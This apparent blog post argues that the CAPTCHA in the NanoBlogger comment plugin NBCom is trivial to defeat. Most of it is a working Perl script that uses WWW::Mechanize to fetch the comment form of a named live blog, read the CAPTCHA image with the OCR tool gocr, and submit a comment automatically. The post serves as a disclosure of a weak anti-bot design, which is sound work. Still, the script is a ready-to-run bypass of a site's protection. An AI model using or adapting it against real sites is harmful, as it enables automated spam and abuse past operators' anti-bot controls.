B10[mg]

For a while now, you can use NBCom (NanoBlogger Comments) on your blog, to handle comments on posts.

While my (slightly altered) CGIComments way of handling comments does not prevents bots from posting, NBCom gives you the impression that it does, by providing a shiny CAPTCHA image.

This, of course, is tempting to break. And yes, it's really, really easy to bypass. Let's look at some code:

#!/usr/bin/perl

use strict;             # Always use strict
use WWW::Mechanize;     # magic module ;-)

# Setup WWW::Mechanize
my $m = new WWW::Mechanize(
   agent => "B10m Anti-Bot Bot",
);

# Retrieve the first page
$m->get('http://nhw.pl/blg/cmt.php?article=/2005/11/22/T01_13_46/index.html');

# Find, download and store the image
my $img = $m->find_image(url_regex => qr/img.php/);
$m->get($img->url, ":content_file"=>'image.png');

# Go back to the form
$m->back;

# Use `gocr` to find the very secret code
my $secret = `/usr/local/bin/gocr image.png`;
chomp($secret);

# Get rid of the image
unlink 'image.png';

# Submit the form
$m->submit_form(
   form_number  => 1,
   fields       => {
      body      => 'Ugh, bots can still post :-( See '.
                   'http://menno.b10m.net/blog/archives/2005/12/15/T16_20_20/index.html',
      txt       => $secret,
   },
);

All set. The script almost contains more comments (to make it readable for everyone) than code and sure as heck, it seems to work.

I guess the author needs to rethink his CAPTCHA strategy here. It's too easy!

(NOTE: Of course, a script like jcwren's A little fun with merlyn is way nicer, but hey, I'm just lazy ;-)